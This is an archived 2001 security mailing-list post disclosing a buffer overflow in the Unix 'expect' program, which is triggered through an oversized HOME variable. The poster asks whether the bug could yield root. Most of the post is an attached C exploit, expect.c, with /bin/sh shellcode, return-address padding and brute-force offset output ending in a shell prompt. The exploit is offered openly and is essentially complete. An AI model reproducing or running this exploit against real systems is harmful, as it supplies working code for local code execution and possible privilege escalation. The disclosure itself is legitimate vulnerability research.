[Fwd: [Fwd: Returned post for bugtraqat_private]]

From: KF (dotslashat_private)
Date: Tue Jun 05 2001 - 02:04:23 PDT

Next message: Kevin J. Menard, Jr.: "Re: [Fwd: [Fwd: Returned post for bugtraqat_private]]"

Previous message: Majid Almassari: "Re: Mail bug"
Next in thread: Kevin J. Menard, Jr.: "Re: [Fwd: [Fwd: Returned post for bugtraqat_private]]"
Reply: Kevin J. Menard, Jr.: "Re: [Fwd: [Fwd: Returned post for bugtraqat_private]]"
Reply: Charles Stevenson: "Re: [Fwd: [Fwd: Returned post for bugtraqat_private]]"
Reply: Charles Stevenson: "Expect Overflow (Continued)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I have found an overflow in and coded the exploit code for several
versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am
unable to think of a situation where this would be useful due to the
fact that expect is not suid...can anyone help me determine if this is
exploitable to obtain root? Perhaps a suid expect script could be
exploited? or maybe something like suid kppp which calls expect as a
helper program?

[root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
[root@linux elguapo]# expect
Segmentation fault (core dumped)

-Kevin Finisterre
dotslashat_private
--------------54785D81E19EEAA4D65A5A40
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii;
 name="expect.c"
Content-Disposition: inline;
 filename="expect.c"

//krfinisterreat_private or dotslashat_private
//this is output from my brute script...
//722
//Stack pointer: 0xbffffa18
//       Offset: 0x2d3
//  Return addr: 0xbffff745
//stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
$3
$L
//723
//Stack pointer: 0xbffffa18
//       Offset: 0x2d4
//  Return addr: 0xbffff744
//sh-2.04#
//note that I was root when I ran this ... expect is not suid

#define BUFFERSIZE 533

unsigned long sp(void)
{
        __asm__("movl %esp, %eax");
}

int main(int argc,char **argv)
{
  char hell[] =
        "\x29\xc0"
        "\x29\xc0"
        "\xb0\x47"
        "\x29\xdb"
        "\xb3\x0c"
        "\x89\xd9"
        "\xcd\x80"
        "\x5e"
        "\x29\xc0"
        "\x88\x46\x07"
        "\x89\x46\x0c"
        "\x89\x76\x08"
        "\xb0\x0b"
        "\x87\xf3"
        "\x8d\x4b\x08"
        "\x8d\x53\x0c"
        "\xcd\x80"
        "\xe8\xe3\xff\xff\xff"
        "\x2f\x62\x69\x6e\x2f\x73\x68";
        int i;
        int offset;
        long esp;
        long ret;
        long *addr_ptr;
        char *buffer, *ptr;
        offset = atoi(argv[1]);
        esp = sp();
        ret = esp-offset;

        if(!(buffer = malloc(BUFFERSIZE)))
        {
                printf("oops\n");
                exit(-1);
        }

        ptr = buffer;
        addr_ptr = (long *)ptr;
        for (i=0; i<BUFFERSIZE; i+=4)
                *(addr_ptr++) = ret;

        for (i=0; i<BUFFERSIZE/2; i++)
                buffer[i] = '\xeb02';

        ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
        for(i=0; i<strlen(hell); i++)
                *(ptr++) = hell[i];

        buffer[BUFFERSIZE-1] = 0;

        setenv("HOME", buffer, 1);
        execlp("/usr/bin/expect", 0);
}

--------------54785D81E19EEAA4D65A5A40--

Next message: Kevin J. Menard, Jr.: "Re: [Fwd: [Fwd: Returned post for bugtraqat_private]]"
Previous message: Majid Almassari: "Re: Mail bug"
Next in thread: Kevin J. Menard, Jr.: "Re: [Fwd: [Fwd: Returned post for bugtraqat_private]]"
Reply: Kevin J. Menard, Jr.: "Re: [Fwd: [Fwd: Returned post for bugtraqat_private]]"
Reply: Charles Stevenson: "Re: [Fwd: [Fwd: Returned post for bugtraqat_private]]"
Reply: Charles Stevenson: "Expect Overflow (Continued)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 08:14:17 PDT